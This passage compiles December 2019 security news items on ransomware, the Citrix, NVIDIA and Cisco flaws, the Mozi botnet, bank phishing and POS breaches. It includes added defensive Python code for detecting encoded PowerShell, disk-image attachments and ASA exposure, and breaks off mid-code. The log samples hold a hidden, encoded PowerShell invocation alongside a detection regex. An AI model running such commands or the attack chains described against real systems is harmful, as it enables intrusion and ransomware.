While the developers admit that PowerShell is no longer the most effective attack vector as there are methods to determine when it is aiding malicious activity, they say that the threat continues to be a realistic one.

Such exploitation toolkits, even if they are intended for penetration testers to probe the security of an organization, are also weapons of choice for real threat actors and Empire is no exception.

The unsupported version of the framework was used by Ryuk and BitPaymer ransomware operators and other advanced adversaries, such as FIN7 and Hades APT group. The new release is expected to follow a similar path.


NVIDIA Patches High Severity Vulnerability in GeForce Experience
24.12.2019 
Bleepingcomputer  Vulnerebility

NVIDIA today issued a security update for the Windows NVIDIA GeForce Experience (GFE) app designed to patch a vulnerability that could allow potential local attackers to trigger a denial of service (DoS) state or escalate privileges on systems running unpatched software.

While this security flaw requires would-be attackers to have local user access and cannot be exploited remotely, it can still be abused via malicious tools dropped remotely on systems running vulnerable NVIDIA GFE versions.

Additionally, attacks designed to exploit this vulnerability are of low complexity according to NVIDIA, require low privileges, and need no user interaction.

NVIDIA GFE is the companion software for GeForce GTX graphics cards, which "keeps your drivers up to date, automatically optimizes your game settings, and gives you the easiest way to share your greatest gaming moments with friends," according to NVIDIA.

Security issue rated as high severity
Attackers can escalate their privileges by exploiting the flaw tracked as CVE-2019-5702, thus gaining permissions beyond the ones initially granted by the system.

Successful exploitation could also enable them to render Windows machines running unpatched software unusable by triggering a denial of service state.

The CVE-2019-5702 vulnerability fixed in the December 2019 security update is detailed below, together with a full description and the CVSS V3 base score assigned by NVIDIA.

CVE: CVE-2019-5702
Description: NVIDIA GeForce Experience contains a vulnerability when GameStream is enabled in which an attacker with local system access can corrupt a system file, which may lead to denial of service or escalation of privileges.
Base Score: 8.4
Vector: AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H

NVIDIA says that the "risk assessment is based on an average of risk across a diverse set of installed systems and may not represent the true risk of your local installation."

The company also "recommends consulting a security or IT professional to evaluate the risk to your specific configuration."

Affected GeForce Experience versions
The software flaw impacts Windows computers running versions of NVIDIA GeForce Experience prior to 3.20.2.

"Earlier software branch releases that support this product are also affected," NVIDIA adds. "If you are using an earlier branch release, upgrade to the latest branch release."

To apply the security update, NVIDIA GeForce Experience users have to download the latest version from the GeForce Experience Downloads page, released today, or launch the GFE client, which applies the update automatically via its built-in update mechanism.

NVIDIA released security updates to fix a series of other high severity GFE flaws in May and November that could have potentially enabled local attackers with basic user privileges to elevate privileges, trigger code execution, or perform denial-of-service (DoS) attacks against vulnerable Windows devices.


Critical Citrix Flaw May Expose Thousands of Firms to Attacks
24.12.2019 
Bleepingcomputer  Attack  Vulnerebility

A newly discovered vulnerability impacting the Citrix Application Delivery Controller (NetScaler ADC) and the Citrix Gateway (NetScaler Gateway) could potentially expose the networks of over 80,000 firms to hacking attacks.

The vulnerability, currently tracked as CVE-2019-19781, could allow remote attackers access to a company's internal network without requiring authentication.

If successfully exploited, it leads to arbitrary code execution according to Positive Technologies' security expert Mikhail Klyuchnikov who discovered the vulnerability.

80,000 firms potentially exposed
Positive Technologies security experts determined that "at least 80,000 companies in 158 countries are potentially at risk," with the top 5 countries being "the United States (the absolute leader, with over 38 percent of all vulnerable organizations), the UK, Germany, the Netherlands, and Australia."

Depending on specific configuration, Citrix applications can be used for connecting to workstations and critical business systems (including ERP). In almost every case, Citrix applications are accessible on the company network perimeter, and are therefore the first to be attacked. - Positive Technologies

While Citrix hasn't yet released new firmware to address this security issue, the company published a set of mitigation measures for standalone systems and clusters as part of this knowledge base article and strongly recommends that impacted customers apply them as soon as possible.

"Customers should then upgrade all of their vulnerable appliances to a fixed version of the appliance firmware when released," Citrix also says.

To be alerted when updated firmware is available for the affected Citrix products, customers are also advised to subscribe to bulletin alerts here.

Affected products and platforms
According to Citrix, the CVE-2019-19781 vulnerability impacts all supported product versions and all supported platforms:

• Citrix ADC and Citrix Gateway version 13.0 all supported builds
• Citrix ADC and NetScaler Gateway version 12.1 all supported builds
• Citrix ADC and NetScaler Gateway version 12.0 all supported builds
• Citrix ADC and NetScaler Gateway version 11.1 all supported builds
• Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds
"Citrix applications are widely used in corporate networks. This includes their use for providing terminal access of employees to internal company applications from any device via the Internet," Positive Technologies's Director of Security Audit Department Dmitry Serebryannikov said.

"Considering the high risk brought by the discovered vulnerability, and how widespread Citrix software is in the business community, we recommend information security professionals take immediate steps to mitigate the threat."

The data breach
Citrix also experienced a data breach as disclosed in March 2019 by the company's Chief Security Information Officer (CSIO) Stan Black following an alert received from the FBI on March 6, 2019.

In May, Citrix confirmed that the hackers behind the breach infiltrated the company's network and stole the sensitive personal information of both former and current employees while maintaining access within Citrix internal assets for about six months.

"We believe that the cyber criminals may have accessed and or removed information relating to certain individuals who are current and former employees, as well as certain beneficiaries and dependents," Citrix said at the time.

"This information may have included, for example, names, Social Security numbers, and financial information."

The same month, a class action complaint was filed by a Citrix ex-employee for damages suffered following the security breach.

According to the class action complaint filed with the U.S. District Court Southern District of Florida, the causes of action are negligence, violations of the Florida Unfair and Deceptive Trade Practices Act, breach of implied contract, breach of fiduciary duty, and breach of confidence.


FBI Issues Alert For LockerGoga and MegaCortex Ransomware
24.12.2019 
Bleepingcomputer  BigBrothers  Ransomware

The FBI has issued a warning to private industry recipients to provide information and guidance on the LockerGoga and MegaCortex Ransomware.

Both LockerGoga and MegaCortex are ransomware infections that target the enterprise by compromising the network and then attempting to encrypt all its devices.

In an FBI Flash Alert marked as TLP:Amber and seen by BleepingComputer, the FBI is warning private industry about the two ransomware infections and how they attack a network.

"Since January 2019, LockerGoga ransomware has targeted large corporations and organizations in the United States, United Kingdom, France, Norway, and the Netherlands. The MegaCortex ransomware, first identified in May 2019, exhibits Indicators of Compromise (IOCs), command and control (C2) infrastructure, and targeting similar to LockerGoga."

According to the alert, the actors behind LockerGoga and MegaCortex will gain a foothold on a corporate network using exploits, phishing attacks, SQL injections, and stolen login credentials.

Once a network is compromised, the threat actors will install the penetration testing tool called Cobalt Strike. This tool allows the attackers to deploy "beacons" on a compromised device to "create shells, execute PowerShell scripts, perform privilege escalation, or spawn a new session to create a listener on the victim system."

When a network is compromised, the actors will be resident on the network for months before they deploy the LockerGoga or MegaCortex ransomware infections.

While the FBI has not said what these attackers are doing during this period, the actors are probably exfiltrating data, deploying information-stealing trojans, and further compromising workstations and servers.

Once the network has been harvested of anything of value, the attackers will deploy the LockerGoga or MegaCortex infections so that they begin to encrypt the devices on the network. This will generate a final revenue source for the attackers.

During the ransomware deployment, the FBI states, the actors will execute a kill.bat or stop.bat batch file that terminates processes and services related to security programs, disables Windows Defender scanning features, and disables security-related services.

The threat actors will also use a variety of LOLBins and legitimate software such as 7-Zip, PowerShell scripts, wmic, nslookup, adfind.exe, mstds.exe, Mimikatz, Ntdsutil.exe, and masscan.exe.

Unfortunately, both of these ransomware infections use a secure encryption algorithm, which means it is not possible to decrypt them for free.

FBI's recommended mitigations
The FBI offers guidance and mitigation advice that business owners should follow to minimize their exposure to the LockerGoga and MegaCortex ransomware.

The most important mitigation provided by the FBI is to make sure you "backup data regularly, keep offline backups, and verify integrity of backup process."

By having working and verified backups, especially offline backups, ransomware is not a threat as you can always restore your data.

Other mitigations suggested by the FBI include:

• Make sure all installed software and operating systems are kept updated. This helps to prevent vulnerabilities from being exploited by the attackers.
• Enable two-factor authentication and strong passwords to block phishing attacks, stolen credentials, or other login compromises.
• As publicly exposed remote desktop servers are a common way for attackers to first gain access to a network, businesses should audit logs for all remote connection protocols.
• Audit the creation of new accounts.
• Scan for open or listening ports on the network and block them from being accessible.
• Disable SMBv1 as numerous vulnerabilities and weaknesses exist in the protocol.
• Monitor the organization's Active Directory and administrator group changes for unauthorized users.
• Make sure you are using the most up-to-date PowerShell and uninstall any older versions.
• "Enable PowerShell logging and monitor for unusual commands, especially execution of Base64 encoded PowerShell"

This guidance is general enough that it applies to all ransomware infections and should be followed by all organizations and even consumers.
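The last FBI item, watching for Base64-encoded PowerShell, is one of the cheapest detections to put in place, because the encoded form is easy to spot in process-creation logs and trivially reversible for review. The added example below is not from the FBI alert; it scans a few constructed Windows process-creation (event 4688-style) log lines, matches the -EncodedCommand switch and its accepted short forms (-e, -ec, -enc, ...), and decodes the payload, which PowerShell expects as Base64 over UTF-16LE text. The log lines and host names are made up; the encoded blob decodes to the harmless command Get-Date.

```python
import base64
import re

# Constructed process-creation log lines (not real telemetry). The Base64 blob
# is "Get-Date" encoded as UTF-16LE, the way PowerShell expects -EncodedCommand.
SAMPLE_LOGS = [
    r"2019-12-20 03:14:07 host01 4688 NewProcessName=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    r"CommandLine=powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand RwBlAHQALQBEAGEAdABlAA==",
    r"2019-12-20 03:14:09 host01 4688 NewProcessName=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    r"CommandLine=powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1",
    r"2019-12-20 03:15:11 host02 4688 NewProcessName=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    r"CommandLine=powershell -nop -w hidden -e RwBlAHQALQBEAGEAdABlAA==",
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand: -e, -ec, -enc,
# -encoded, ... The alternation below matches those while rejecting -ExecutionPolicy
# (which continues with "x"). The argument must look like Base64 of useful length.
ENCODED_SWITCH = re.compile(
    r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/]{16,}={0,2})"
)


def decode_powershell_blob(blob: str):
    """Return the UTF-16LE text behind an -EncodedCommand argument, or None if
    the argument is not valid Base64/UTF-16LE (still worth flagging in that case)."""
    try:
        raw = base64.b64decode(blob, validate=True)
        return raw.decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def find_encoded_powershell(lines):
    """Scan log lines and return one finding per encoded PowerShell invocation."""
    findings = []
    for number, line in enumerate(lines, start=1):
        if "powershell" not in line.lower():
            continue
        match = ENCODED_SWITCH.search(line)
        if not match:
            continue
        blob = match.group(1)
        findings.append({
            "line": number,
            "blob": blob,
            "decoded": decode_powershell_blob(blob),
        })
    return findings


if __name__ == "__main__":
    for finding in find_encoded_powershell(SAMPLE_LOGS):
        print(f'line {finding["line"]}: decoded={finding["decoded"]!r}')
```

Decoding at log time is what makes the alert actionable: a reviewer sees the actual command rather than a blob, and a Base64 argument that fails to decode as UTF-16LE is itself suspicious, since that is the only encoding PowerShell accepts for this switch.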


Uptick Seen in ISO Email Attachments Delivering Malware
24.12.2019 
Bleepingcomputer  Spam  Virus

Security researchers analyzing malicious spam campaigns noticed an increase in malware delivered inside disk image files, with .ISO being the most prevalent format.

Acting as an archive-like container, a disk image is typically a clone of a physical drive that can be mounted as a virtual disk to access data on it organized with the same file structure as the original.

Cybercriminals have been using this type of file for years, but researchers at Trustwave say they observed an increase in malicious ISO attachments this year.

Among the most popular threats delivered this way are remote access tools (NanoCore, Remcos) and LokiBot information stealer.


At 6% of all malicious attachments seen in 2019, the uptick is not spectacular but should be viewed with concern. Most secure email gateways block executable files and a malicious ISO can slip through.

Choosing ISO to deliver malware makes sense since the Windows operating system can mount this file type when it is double-clicked. This allows scammers to disguise the threat as an innocent file.

In a recent campaign caught by Trustwave, cybercriminals created a fake FedEx shipment email message to trick recipients into downloading a malicious ISO that included an executable.

As visible in the image above, the link points to an ISO file that attempts to appear as a PDF. Inside the image was an executable for the NanoCore RAT.

At the time of the discovery, the image was flagged as malicious by 18 out of 70 antivirus engines on VirusTotal. NanoCore is not new malware and is normally easy to detect, yet packing it this way lowered its detection rate.

It is unclear if it was a targeted attack but anyone that had indeed sent a package with FedEx would likely try to read the details in the fake PDF.

"The email was drafted in the French language, hence targeting French speakers. The lure was short and precise suggesting failure to deliver a FedEx parcel due to incorrect address, while guiding the victim to download the attached document from FedEx to update their address" - Trustwave

ISO is not the only image file abused this way. In what appears to be a targeted attack, the cybercriminals sent invoice-themed emails with an attachment in DAA (Direct Access Archive) format.

The payload, in this case, was the professional version of another remote access tool called Remcos, known for being used in cybercriminal activities.

Unlike ISO, the DAA type of image needs specialized software to be mounted and get to the files within, indicating that the crooks knew that the recipient had the necessary application installed.

According to Trustwave, the DAA images in this campaign contained a single executable with either .COM or .EXE extension, which the researchers determined to be Remcos RAT v2.5.0 Pro.

Based on observations this year, Trustwave believes that cybercriminals have started to experiment more with disk image archives to conceal their malware in a way that slips past security solutions.

With ISO being more popular and easier to unpack, threat actors tend to turn to it rather than other formats that require proprietary software to mount.

However, Trustwave believes that ISO is used for wider attacks that do not focus on a particular victim. DAA and similar image formats that require additional tools to open are reserved for targeted attacks.

The cloaking provided by disk image formats against antivirus solutions has been analyzed earlier this year by other security researchers that tested malware in tiny VHD files. In an experiment with Agent Tesla info-stealer encased in a 7MB VHD, detection rates were negligible.
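Both the ISO campaign above and the VHD experiment mentioned here work because mail gateways tend to judge attachments by extension and executable signatures, while the container format is what actually decides whether Windows will mount the file. The added example below, written for this article rather than taken from Trustwave's research, classifies attachments by content: an ISO 9660 image carries the identifier "CD001" in its volume descriptors starting at sector 16 (2048-byte sectors), UDF uses "NSR02"/"NSR03" in the same area, a VHD ends with a 512-byte footer whose cookie is "conectix", and a VHDX begins with "vhdxfile". The sample attachments are constructed in code; the first one is a minimal ISO carrying a .pdf name, the disguise described in the article. DAA is left out because its header layout is proprietary.

```python
SECTOR = 2048  # ISO 9660 / UDF logical sector size

DISK_IMAGE_TYPES = {"iso9660", "udf", "vhd", "vhdx"}
DISK_IMAGE_EXTENSIONS = {"iso", "udf", "img", "vhd", "vhdx"}


def classify_attachment(data: bytes) -> str:
    """Identify disk-image containers from their bytes, ignoring the file name."""
    # ISO 9660 / UDF: volume descriptors start at sector 16. Each descriptor has a
    # type byte followed by a 5-byte identifier; "CD001" means ISO 9660 and the
    # UDF volume recognition sequence ends with an "NSR02"/"NSR03" descriptor.
    for sector in range(16, 32):
        offset = sector * SECTOR
        ident = data[offset + 1:offset + 6]
        if len(ident) < 5:
            break
        if ident == b"CD001":
            return "iso9660"
        if ident in (b"NSR02", b"NSR03"):
            return "udf"
    # VHDX: 8-byte signature at offset 0.
    if data[:8] == b"vhdxfile":
        return "vhdx"
    # VHD: 512-byte footer at the end of the file; dynamic VHDs also mirror it at offset 0.
    if data[:8] == b"conectix" or (len(data) >= 512 and data[-512:-504] == b"conectix"):
        return "vhd"
    return "other"


def scan_attachments(attachments):
    """Flag disk images, and note when the file name hides the real format."""
    findings = []
    for name, data in attachments:
        kind = classify_attachment(data)
        if kind not in DISK_IMAGE_TYPES:
            continue
        ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
        findings.append({"name": name, "type": kind,
                         "ext_mismatch": ext not in DISK_IMAGE_EXTENSIONS})
    return findings


# Constructed sample attachments (not real malware samples).
def make_fake_iso() -> bytes:
    """Zero-filled image with only a primary volume descriptor at sector 16."""
    image = bytearray(17 * SECTOR + 64)
    image[16 * SECTOR] = 1                           # descriptor type 1 = primary
    image[16 * SECTOR + 1:16 * SECTOR + 6] = b"CD001"
    return bytes(image)


def make_fake_vhd() -> bytes:
    """Some data followed by a 512-byte footer starting with the VHD cookie."""
    return b"\x00" * 1024 + b"conectix" + b"\x00" * 504


SAMPLE_ATTACHMENTS = [
    ("FedEx_Delivery_Notice.pdf", make_fake_iso()),   # disk image hiding behind .pdf
    ("invoice.pdf", b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\n"),  # genuine-looking PDF header
    ("backup.vhd", make_fake_vhd()),                  # disk image, honestly named
]


if __name__ == "__main__":
    for finding in scan_attachments(SAMPLE_ATTACHMENTS):
        print(finding)
```

A gateway rule built on this check can quarantine disk images regardless of name, or at least strip them from external mail, which removes the double-click-to-mount path the article describes without having to recognise the payload inside.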


New Mozi P2P Botnet Takes Over Netgear, D-Link, Huawei Routers
24.12.2019 
Bleepingcomputer  BotNet

Netgear, D-Link, and Huawei routers are actively being probed for weak Telnet passwords and taken over by a new peer-to-peer (P2P) botnet dubbed Mozi and related to the Gafgyt malware as it reuses some of its code.

Security researchers at 360 Netlab who discovered it and monitored its activities for roughly four months also found that the botnet's main purpose is to be used in DDoS attacks.

The botnet is implemented using a custom extended Distributed Hash Table (DHT) protocol based on the standard one commonly used by torrent clients and other P2P platforms to store node contact info.

This makes it faster to establish the botnet's network without the need to use servers, as well as easier to "hide the valid payload in the vast amount of normal DHT traffic so detection is impossible without proper knowledge," as 360 Netlab found.

Mozi also uses ECDSA384 and the XOR algorithm to assure the integrity and security of the botnet's components and the P2P network.

Mozi botnet (360 Netlab)
Propagation method and targeted devices
The malware uses telnet and exploits for propagation to new vulnerable devices by logging in to any targeted router or CCTV DVR that comes with a weak password, dropping and executing a payload after successfully exploiting unpatched hosts.

Once the malware is loaded on the now compromised device, the newly activated bot will automatically join the Mozi P2P network as a new node.

The next stage of the infection sees the new bot nodes receiving and executing commands from the botnet master, while also searching for and infecting other vulnerable Netgear, D-Link, and Huawei routers to add to the botnet.

"After Mozi establishes the p2p network through the DHT protocol, the config file is synchronized, and the corresponding tasks are started according to the instructions in the config file," the researchers explain.

Mozi botnet infection activity (360 Netlab)
To make sure that their botnet is not taken over by other threat actors, Mozi's operators set it up to automatically verify all commands and synced configs sent to the botnet's nodes, with only the ones passing these built-in checks being accepted and executed by the nodes.

The main instructions accepted by Mozi nodes are designed to:

• Launch DDoS attacks (this module reuses Gafgyt's attack code, supports HTTP, TCP, UDP, and other attacks)
• Collect and exfiltrate bot info (Bot ID, IP, PORT, filename (full path), gateway, CPU architecture)
• Execute payload from URL
• Update from the specified URL
• Execute system or bot custom commands

As the 360 Netlab researchers found while monitoring Mozi activity since September 03, when they discovered the first sample, these are the ten unpatched devices the malware will attack, infect, and add to the P2P network:

Affected Device | Vulnerability
Eir D1000 Router | Eir D1000 Wireless Router RCI
Vacron NVR devices | Vacron NVR RCE
Devices using the Realtek SDK | CVE-2014-8361
Netgear R7000 and R6400 | Netgear cgi-bin Command Injection
DGN1000 Netgear routers | Netgear setup.cgi unauthenticated RCE
MVPower DVR | JAWS Webserver unauthenticated shell command execution
Huawei Router HG532 | CVE-2017-17215
D-Link Devices | HNAP SoapAction-Header Command Execution
GPON Routers | CVE-2018-10561, CVE-2018-10562
D-Link Devices | UPnP SOAP TelnetD Command Execution
CCTV DVR | CCTV/DVR Remote Code Execution

P2P botnets increasingly common
P2P botnets like Nugache and Storm (aka Peacomm), Sality P2P, Waledac, Kelihos (aka Hlux), ZeroAccess (aka Sirefef), Miner, and Zeus P2P raised huge armies for their masters since at least the beginning of 2006 but most of them are now extinct.

Others, such as Hajime and Hide 'N Seek (aka HNS), are still scanning for vulnerable devices to compromise and zombify one by one.

Hide 'N Seek, for example, grew to over 90,000 devices in just a few days in September 2018, while Hajime 'zombified' around 300,000 infected devices in about six months after being first spotted during the fall of 2016.

Even though P2P botnets are known to be highly resilient against sinkholing attacks designed to disrupt and even shut them down, there are examples, such as ZeroAccess and Kelihos, that proved vulnerable.

Until more details about Mozi surface and get examined for potential weaknesses, the feasibility of a sinkholing attack against it is anyone's guess. Until then, Mozi has everything it needs to keep harvesting bots if the routers and other devices it targets aren't patched.

Another P2P botnet dubbed Roboto, discovered by the same research team, has also been scanning the Internet for Linux servers running unpatched Webmin installations since it was first spotted in late August.

Additional information on the inner workings of this new P2P botnet and malware sample hashes are available at the end of 360 Netlab's Mozi report.


Two-Year Long Phishing Campaign Impersonates Canadian Banks
24.12.2019 
Bleepingcomputer  Phishing

Canadian banks are being impersonated in a phishing campaign targeting both individuals and businesses via a large-scale infrastructure shared with previous attacks going back to 2017 and pointing to the same attackers.

The infrastructure behind these Canadian focused attacks includes hundreds of phishing websites designed to mimic major Canadian banks' websites as part of an effort to steal user credentials from the financial institutions' clients.

To get the targets on their phishing landing pages, the attackers use custom-crafted and legitimate-looking email messages with malicious PDF attachments.

The attachments are also designed to look like official communications from the potential victims' banks, including bank logos and almost flawless grammar.

Attackers also leverage urgency-inducing language, a highly common tactic in phishing attacks, warning victims that their accounts will be locked if no action is taken within the next two days.

Sample phishing email (Check Point)
Swiping the banking credentials
In the phishing emails, the attackers ask their victims to log into their bank accounts as urgently as possible to update various account-related information.

After the links embedded in the PDF attachments are clicked, the targets will be sent to a phishing landing page that clones the bank's real login page where they are "asked to enter their sign-in ID password in the two-factor authentication token provided by the bank."

The attackers used a quick technique to clone the banks' login pages: they placed a screenshot of the bank's real website on the landing page used to collect credentials, with text boxes laid over the login fields where the information has to be entered.

However, as the Check Point researchers that discovered this ongoing phishing campaign found, "while the victim is waiting for the request to be processed, the attackers steal those credentials and transfer money behind the scenes."

RBC phishing landing page (Check Point)
Furthermore, while analyzing the current campaign, the researchers were able to spot connections to previous attacks reported in 2017 by IBM X-Force's research team, attacks that were also targeting Canadian banks' customers.

Just like in the case of the current campaign, IBM X-Force's researchers said at the time that the attacks were "designed to trick those with account access to divulge their company’s online banking credentials, one-time passwords, and two-factor authentication codes."

Additionally, they also found that "the goal of this targeted phishing attack is to take the account over and transfer money to mule accounts that the criminals control."

Targeted Canadian banks
In all, Check Point's research team discovered over 300 domains that closely resemble bank websites and were used to host phishing websites for the following Canadian banks:

• The Royal Bank of Canada
• Scotiabank
• BMO Bank of Montreal
• Interac
• Tangerine
• Desjardins Bank
• CIBC Canadian Imperial Bank of Commerce
• TD Canada Trust
• Simplii Financial
• ATB Financial
• American Express
• Rogers Communications
• Coast Capital Savings
• Wells Fargo
More detailed information on how the attackers hosted multiple domains on the servers they controlled, as well as more examples of the phishing landing pages used in these attacks, is available in Check Point's report.

Indicators of compromise (IOCs) including a list of IP addresses and phishing PDF sample hashes are also listed at the end of the report published here.


One Day, Three Credit Card Data Breach Notifications
24.12.2019 
Bleepingcomputer  Incindent

On the same day this week, two restaurants and a convenience store, all with locations across the U.S., disclosed security breach incidents that may have enabled attackers to steal customer payment card data.

In all three cases, malware designed to collect magnetic stripe data was discovered on payment processing servers for card transactions.

Wawa store, food market, coffee shop, gas pump
The most prominent on this shortlist is the Wawa convenience store chain, with all its locations potentially impacted starting March 4, 2019.

Current investigation results show that exposed payment card (debit and credit) information includes numbers, expiration dates, and cardholder names.

In the data breach notification on Thursday, Wawa states that personal identification numbers (PINs) needed for approving transactions, typically above a specific limit, were not impacted. CVVs (card validation values) used for card-not-present purchases (online shopping) also remained safe.

Wawa's security team found the malicious software on the payment processing servers on December 10 and was able to contain it by December 12. The investigation determined that the "malware began running at different points in time after March 4, 2019."

Chris Gheysens, Wawa CEO, says that none of the impacted customers will be liable for the fraudulent charges related to the incident. Free identity protection and credit monitoring services are provided to Wawa customers whose information may have been involved.

Islands restaurants
The number of Islands restaurants impacted by the PoS malware incident disclosed on the same day as Wawa's is 60. Most of them are in California, with the other locations in Arizona, Hawaii, and Nevada.

The restaurant chain was alerted to a potential payment card issue, and an investigation revealed that there was reason for concern.

Not all devices in all restaurants were compromised. A list of affected Islands locations is accessible from the breach disclosure page.

The PoS malware campaign began on February 13 and continued until September 27, compromising locations on various dates. The malware searched for data on the magnetic stripe that contained the cardholder name, card number, expiration date, and internal verification code.

Islands restaurants' notification states that malware is no longer present on payment card processing devices at its locations.

Champagne French Bakery Cafe
The restaurant chain announced its data breach on the same day as Wawa, but the details differ. Following an alert regarding PoS malware, Champagne initiated an investigation with the help of a computer forensics company.

The inspection revealed that PoS malware had been installed starting February 13 at various locations. Starting this date and continuing through September 27, "malware was installed on certain point-of-sale devices in our restaurants that were used for payment card transactions," reads the notification.

According to the official statement, eight locations were compromised and, at seven of them, card data could not be extracted during some weeks in March, just as in the Islands compromise.

Similar to the incident affecting Islands restaurants, the following data from the magnetic stripe was exposed: cardholder name, card number, expiration date, and internal verification code. Also, the malware did not always identify the owner's name in the payment card info, something that Islands also mentioned in their disclosure.

Neither Champagne nor Islands provides free identity protection and credit monitoring services, but both inform their customers that they can request a free copy of their credit report once a year.


Avast and AVG Firefox Extensions Added Back to Mozilla Addons Site
24.12.2019 
Bleepingcomputer  Security

Mozilla has allowed the AVG and Avast Online Security extensions back into its addons site after the extensions were changed to reduce the amount of tracking data sent to Avast's and AVG's servers.

The AVG Online Security and Avast Online Security extensions check whether a URL the user is visiting is a malicious, phishing, or scam site and warn the user.

At the beginning of December, Mozilla removed the Avast Online Security, AVG Online Security, Avast SafePrice, and AVG SafePrice extensions from the Firefox addons site after it was discovered that they were sending a large amount of user tracking data to Avast.

At the time, Avast told BleepingComputer that they were making changes to the extensions to meet Mozilla's requirements and that they would be available again when finished.

"Avast is working with Mozilla to resolve this issue. We have already implemented some of Mozilla's new requirements and will release further updated versions that are fully compliant and transparent per the new requirements. These will be available as usual on the Mozilla store in the near future," Avast told BleepingComputer in a statement.

In a statement to BornCity.com, Avast stated that they have reduced the amount of data sent by the Avast Online Security and AVG Online Security extensions and have also updated their privacy policies to explain exactly what is sent.

"Privacy is our top priority and the discussion about what is best practice in dealing with data is an ongoing one in the tech industry. We have never compromised on the security or privacy of personal data. We are listening to our users and acknowledge that we need to be more transparent with our users about what data is necessary for our security products to work, and to give them a choice in whether they wish to share their data further and for what purpose. We made changes to our extensions including limiting the use of data and these changes are explained clearly in our Privacy Policy. Our browser extensions Avast Online Security and AVG Online Security are back on the Chrome Store, and on the Mozilla Store (since 12/17). It’s important to us that users understand that we’re listening to concerns about transparency and data use, and striving to do better and lead by example in this area."

With these changes, the Avast Online Security and AVG Online Security extensions are back in the Mozilla addon site and will display a confirmation dialog that asks users to confirm if they wish URLs to be scanned.

Confirmation dialog
Tests by BleepingComputer show that only the URL being visited and some unidentified information is transmitted.

This is much less than the previous versions, which transmitted the page title, the referer, your OS version, your country code, whether you previously visited the page, and more.


Cisco Security Appliances Targeted for DoS Attacks via Old Bug
24.12.2019 
Bleepingcomputer  Attack  Vulnerebility

A critical vulnerability fixed in mid-2018 has recently been resurrected in denial-of-service and information disclosure attempts against Cisco's Adaptive Security Appliance (ASA) and Firepower products.

The company has issued a warning urging its customers to follow its recommendations for proper mitigation.

DoS and sensitive info
Tracked as CVE-2018-0296, the vulnerability can be leveraged by an unauthenticated, remote attacker to cause the appliance to reload by simply sending it a crafted HTTP request.

An attacker can also exploit this bug to view sensitive system information without authentication. On affected devices, this is achievable through path traversal techniques.

The first exploit attempts in the wild were registered immediately after Cisco disclosed the details of the bug and published patched software for the affected products. At the time, the attackers aimed at causing a DoS condition.

At the end of the workweek, though, exploitation attempts in the wild grew to a number sufficiently high for Cisco to advise ASA and Firepower customers to make sure that the devices run on a version of code that is not vulnerable to CVE-2018-0296.

The attacks have been happening for several weeks and have kept increasing in frequency, suggesting that enough victims still exist for the effort to be worth it.

Check for risk
Admins that want to determine if the products they manage are vulnerable can start by running the following command:

show asp table socket | include SSL|DTLS
Potential for exploitation exists if listening sockets are shown. However, a vulnerable process needs to be running for an attack to succeed. Its status can be checked with this command:

show processes | include Unicorn
"The likelihood of a vulnerability existing is elevated" on devices that have this process running, writes Nick Biasini, threat researcher at Cisco Talos.

In this case, to determine whether there is a risk, admins should check whether the software version running on their devices is affected by the bug. That information is available in the original advisory for the vulnerability.

The reason for making this check before updating to a newer version is that the vulnerability lies in the web framework of ASA/Firepower products, so not all appliances are affected.
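The three checks above (listening SSL/DTLS sockets, a running Unicorn process, and the running release versus the advisory's fixed release) can be turned into a small triage script. The following is an added example, not Cisco's or Talos's code: it parses captured output of the two show commands from the article and applies the article's decision logic. The sample command output is constructed for the example and only approximates the real column layout, so the parser keys on tokens rather than column positions; the version strings in the usage block are placeholders, and the first fixed release for a given train must be taken from the Cisco advisory.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample output (not captured from a real device) for:
#   show asp table socket | include SSL|DTLS
#   show processes | include Unicorn
SAMPLE_SOCKETS = """\
Protocol  Socket    State     Local Address      Foreign Address
SSL       0001a4c8  LISTEN    192.0.2.1:443      0.0.0.0:*
DTLS      0001a4d0  LISTEN    192.0.2.1:443      0.0.0.0:*
SSL       0001b2f0  ESTAB     192.0.2.1:443      198.51.100.7:51532
"""
SAMPLE_PROCESSES = "Mwe  0x00000000018e1e1c  0x00007f8d2c0e3f40  Unicorn Admin Handler\n"


def parse_listening_sockets(text: str) -> List[Tuple[str, str]]:
    """Return (protocol, local address) for every SSL/DTLS socket in LISTEN state."""
    found = []
    for line in text.splitlines():
        tokens = line.split()
        if len(tokens) >= 4 and tokens[0] in ("SSL", "DTLS") and "LISTEN" in tokens:
            found.append((tokens[0], tokens[3]))
    return found


def unicorn_running(text: str) -> bool:
    """True when the filtered 'show processes' output lists a Unicorn process."""
    return any("Unicorn" in line for line in text.splitlines())


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn a release string such as '9.8(2)12' or '9.8.2.12' into a comparable tuple."""
    return tuple(int(n) for n in re.findall(r"\d+", version))


def version_is_fixed(running: str, first_fixed: str) -> bool:
    """True when the running release is at or beyond the first fixed release.
    Compare only against the fixed release listed for the device's own train."""
    a, b = parse_version(running), parse_version(first_fixed)
    width = max(len(a), len(b))
    a += (0,) * (width - len(a))
    b += (0,) * (width - len(b))
    return a >= b


@dataclass
class RiskAssessment:
    level: str                        # "LOW", "MEDIUM" or "HIGH"
    reason: str
    listening: List[Tuple[str, str]]
    unicorn: bool


def assess(sockets_output: str, processes_output: str,
           running_version: Optional[str] = None,
           first_fixed_version: Optional[str] = None) -> RiskAssessment:
    """Apply the article's logic: no listeners -> not exposed; fixed release -> low;
    listeners plus a running Unicorn process on an unfixed release -> high."""
    listening = parse_listening_sockets(sockets_output)
    unicorn = unicorn_running(processes_output)
    if not listening:
        return RiskAssessment("LOW", "no SSL/DTLS listening sockets; web framework not exposed",
                              listening, unicorn)
    if running_version and first_fixed_version and version_is_fixed(running_version, first_fixed_version):
        return RiskAssessment("LOW", "exposed, but running a release at or beyond the advisory's fixed release",
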